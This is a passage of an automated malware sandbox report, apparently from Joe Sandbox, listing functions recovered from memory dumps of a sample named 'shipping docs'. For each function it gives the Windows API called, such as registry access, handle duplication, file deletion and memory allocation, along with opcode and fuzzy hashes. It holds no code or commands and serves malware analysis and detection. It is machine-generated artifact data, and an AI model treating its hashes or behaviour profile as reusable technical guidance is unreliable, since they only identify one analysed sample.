                                                                                              • Opcode Fuzzy Hash: 409e3ed2006225ac9cb305802355462496042c7d6b23281a4216b2b23134030f
                                                                                              • Instruction Fuzzy Hash: B831EEB1D0025C9FCB20DF9AC884A9EFBF5BF88314F15812AE919AB310C7749945CFA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0684EE8C Relevance: 1.6, APIs: 1, Instructions: 83registryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • RegOpenKeyExW.KERNELBASE(80000001,00000000,?,00000001,?), ref: 0684F874
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.552253904.0000000006840000.00000040.00000800.00020000.00000000.sdmp, Offset: 06840000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_6840000_shipping docs.jbxd
                                                                                              Similarity
                                                                                              • API ID: Open
                                                                                              • String ID:
                                                                                              • API String ID: 71445658-0
                                                                                              • Opcode ID: 617b4c4a00ce9c97fccac450c41fa11d2d33bdfb15084ef73e778eb3cb2c2fca
                                                                                              • Instruction ID: 77e6d6506dc45ba37c6295f055fa6002b15c84d4789f6838e09ee3f75fd0143f
                                                                                              • Opcode Fuzzy Hash: 617b4c4a00ce9c97fccac450c41fa11d2d33bdfb15084ef73e778eb3cb2c2fca
                                                                                              • Instruction Fuzzy Hash: 6C31E0B1D0424D9FDB14DF99C584A8EFBF5BF88304F29816EE909AB340C7759885CBA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 066FFB41 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 066FFBCF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.550173381.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_66f0000_shipping docs.jbxd
                                                                                              Similarity
                                                                                              • API ID: DuplicateHandle
                                                                                              • String ID:
                                                                                              • API String ID: 3793708945-0
                                                                                              • Opcode ID: 81a63d595f096899f15891fc9e93652aaefab275ceff0618ec18753c7aa87f9c
                                                                                              • Instruction ID: e8b623aa1e51553b2bf323defa70082b0e6b38f7e83f3c91baa6a08321125ff9
                                                                                              • Opcode Fuzzy Hash: 81a63d595f096899f15891fc9e93652aaefab275ceff0618ec18753c7aa87f9c
                                                                                              • Instruction Fuzzy Hash: BF21E2B5900249AFDB10CFA9D984ADEFFF9FB48324F14845AE954A3310D378A944CFA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 066FFB48 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 066FFBCF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.550173381.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_66f0000_shipping docs.jbxd
                                                                                              Similarity
                                                                                              • API ID: DuplicateHandle
                                                                                              • String ID:
                                                                                              • API String ID: 3793708945-0
                                                                                              • Opcode ID: c73f5d6386e9029ea9386d158a85d1765852835fce2f7b4295da7ba4f8bbe813
                                                                                              • Instruction ID: abed57be82c723da877aa3aa3c9a03e59c5cb3beb61ef9f8cdf6830a0eaf2e4b
                                                                                              • Opcode Fuzzy Hash: c73f5d6386e9029ea9386d158a85d1765852835fce2f7b4295da7ba4f8bbe813
                                                                                              • Instruction Fuzzy Hash: 3521F3B5D002499FDB10CFA9D884ADEFBF8FB48324F14845AE954A3310D378A944CFA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 02DF579F Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • RtlEncodePointer.NTDLL(00000000), ref: 02DF582A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.516802887.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_2df0000_shipping docs.jbxd
                                                                                              Similarity
                                                                                              • API ID: EncodePointer
                                                                                              • String ID:
                                                                                              • API String ID: 2118026453-0
                                                                                              • Opcode ID: cabd5bba06d228518f50fede5e8a4d1c7c229a630a35f151139c997a6b64a005
                                                                                              • Instruction ID: fb8d8e02ca285dc410d06731feca217abbcdcc8f6130edfc1053d9e7ed0a5140
                                                                                              • Opcode Fuzzy Hash: cabd5bba06d228518f50fede5e8a4d1c7c229a630a35f151139c997a6b64a005
                                                                                              • Instruction Fuzzy Hash: 5C21BE788003848FCB50CFA9E4497DABBF8FB08314F14806AD504A7741C379A585CFA5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 061F6324 Relevance: 1.6, APIs: 1, Instructions: 59fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • DeleteFileW.KERNELBASE(00000000), ref: 061F86D8
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.548518531.00000000061F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_61f0000_shipping docs.jbxd
                                                                                              Similarity
                                                                                              • API ID: DeleteFile
                                                                                              • String ID:
                                                                                              • API String ID: 4033686569-0
                                                                                              • Opcode ID: 86dd6e4290d74e6387001f710137bc835a81320a181885e0deaa0849ac65cfde
                                                                                              • Instruction ID: 10a5e7940626996e2b0fd237a9be269b429576338b8eebea45786014aef24577
                                                                                              • Opcode Fuzzy Hash: 86dd6e4290d74e6387001f710137bc835a81320a181885e0deaa0849ac65cfde
                                                                                              • Instruction Fuzzy Hash: 312142B1C1065A8BCB50CF9AC444BAEFBB4FB48224F05816AE918B7240D738A945CFE1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 02DF57B0 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • RtlEncodePointer.NTDLL(00000000), ref: 02DF582A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.516802887.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_2df0000_shipping docs.jbxd
                                                                                              Similarity
                                                                                              • API ID: EncodePointer
                                                                                              • String ID:
                                                                                              • API String ID: 2118026453-0
                                                                                              • Opcode ID: 915dc2eef03c24d4f1003f9c0435b7c6335a3abd9655ce7998ecc8822bcc8fcc
                                                                                              • Instruction ID: c35353984d996f709a1ccafb44e341ab17e4f7098b849d2f898db209b9813a3f
                                                                                              • Opcode Fuzzy Hash: 915dc2eef03c24d4f1003f9c0435b7c6335a3abd9655ce7998ecc8822bcc8fcc
                                                                                              • Instruction Fuzzy Hash: 25116AB89003898FCB50CFA9E54879EBBF8FB48314F548029D505A7740D779A984CFA5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 02DF0A98 Relevance: 1.6, APIs: 1, Instructions: 52memoryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • VirtualAllocExNuma.KERNELBASE(?,?,?,?,?,?), ref: 02DF0B06
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.516802887.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_2df0000_shipping docs.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocNumaVirtual
                                                                                              • String ID:
                                                                                              • API String ID: 4233825816-0
                                                                                              • Opcode ID: 063535e5b50ff8b9df82fccb0e93658ccfa7af12839cffaabd029957b8b22bd1
                                                                                              • Instruction ID: ebeea86389e6f034e05049ff699e64f1d336f24086b2cb7d05173ed9190dc63f
                                                                                              • Opcode Fuzzy Hash: 063535e5b50ff8b9df82fccb0e93658ccfa7af12839cffaabd029957b8b22bd1
                                                                                              • Instruction Fuzzy Hash: 1D1123B19002499FCB10CF9AD884BDFBBF4FB88324F158419E558A7310C375A944CFA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 02DF0B4A Relevance: 1.3, APIs: 1, Instructions: 42sleepCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.516802887.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_2df0000_shipping docs.jbxd
                                                                                              Similarity
                                                                                              • API ID: Sleep
                                                                                              • String ID:
                                                                                              • API String ID: 3472027048-0
                                                                                              • Opcode ID: e1342325ca2dc3e138ea310d9cc6852ae40e7f0149c984455c0d2a02d0219805
                                                                                              • Instruction ID: 182ff90c8a7626a79cdfcaaf58d2e2d58c8251bf7ec613018dcb7ee1ff87c232
                                                                                              • Opcode Fuzzy Hash: e1342325ca2dc3e138ea310d9cc6852ae40e7f0149c984455c0d2a02d0219805
                                                                                              • Instruction Fuzzy Hash: B11100B09002498FCB10DF9AD489BDEBBF4AB48328F11845AD559A7340D374A944CFA2
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 02DF0B50 Relevance: 1.3, APIs: 1, Instructions: 41sleepCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.516802887.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_2df0000_shipping docs.jbxd
                                                                                              Similarity
                                                                                              • API ID: Sleep
                                                                                              • String ID:
                                                                                              • API String ID: 3472027048-0
                                                                                              • Opcode ID: 3d5f42c830de16bbcdb87874af3b0e16e178a5ed2f1cdb3c447e243a58151201
                                                                                              • Instruction ID: 0dc941471aaa177b8d1d2de99c9c5becd101b8a41fefebde069c41da0143f080
                                                                                              • Opcode Fuzzy Hash: 3d5f42c830de16bbcdb87874af3b0e16e178a5ed2f1cdb3c447e243a58151201
                                                                                              • Instruction Fuzzy Hash: 72111EB08002498FCB10CF9AD484BDEFBF4FB88328F11845AD568A7340C374A944CFA2
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 02CBE16B Relevance: .3, Instructions: 308COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.515938608.0000000002CBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CBD000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_2cbd000_shipping docs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 15c55003f52b560274cda59af694287df9edd388a0734da46c7a517345bd268a
                                                                                              • Instruction ID: 3467a0a27a0449c74922ab52c47624a629bba6dbb25a6619b04f5414ad860f74
                                                                                              • Opcode Fuzzy Hash: 15c55003f52b560274cda59af694287df9edd388a0734da46c7a517345bd268a
                                                                                              • Instruction Fuzzy Hash: BA716F7544E7C0AFD3138B309CA5BC67F709F43219F5980EBE1C48A1B3D26A995AC762
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 02CAD4D8 Relevance: .1, Instructions: 75COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.515690458.0000000002CAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CAD000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_2cad000_shipping docs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 76f20bf575b366a57116dd1a8fc0ea9a5099c9478714c0e8432c67ab291c799d
                                                                                              • Instruction ID: 39548bf6f686a6aa8b428ee04bf1fff93716a6baaea88c7b8d34479142127528
                                                                                              • Opcode Fuzzy Hash: 76f20bf575b366a57116dd1a8fc0ea9a5099c9478714c0e8432c67ab291c799d
                                                                                              • Instruction Fuzzy Hash: 672164F2504245DFDB04CF00D8D4B26BBA5FB8832CF2486A9E9074B606C336D946CBA2
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 02CBE3F0 Relevance: .1, Instructions: 72COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.515938608.0000000002CBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CBD000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_2cbd000_shipping docs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 1116ed96bb984c60129c4deeeb6146bba5e01f8347a40f9eb86a905961fafc49
                                                                                              • Instruction ID: ce7941dae5cab19c3bc929614e8bb3fd7ca81caa27831802596253aefa50af6e
                                                                                              • Opcode Fuzzy Hash: 1116ed96bb984c60129c4deeeb6146bba5e01f8347a40f9eb86a905961fafc49
                                                                                              • Instruction Fuzzy Hash: A42125B1604244DFDB01CF90D8C0BA6BB65FF88714F24C969D9494B346C336D806CEA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 02CAD4D3 Relevance: .1, Instructions: 56COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.515690458.0000000002CAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CAD000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_2cad000_shipping docs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: a4ebfea70809b752dd87daf1091c6fefd11053e22c75fac3715a094701740d1c
                                                                                              • Instruction ID: 50fe0d25d68a62026106d3e5c84846c568cfe49c6e3b21038468ea5e132ce23f
                                                                                              • Opcode Fuzzy Hash: a4ebfea70809b752dd87daf1091c6fefd11053e22c75fac3715a094701740d1c
                                                                                              • Instruction Fuzzy Hash: 7D11D3B6404281CFCB11CF10D5C4B16BF71FB88328F2486A9D8060B656C33AD556CBA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%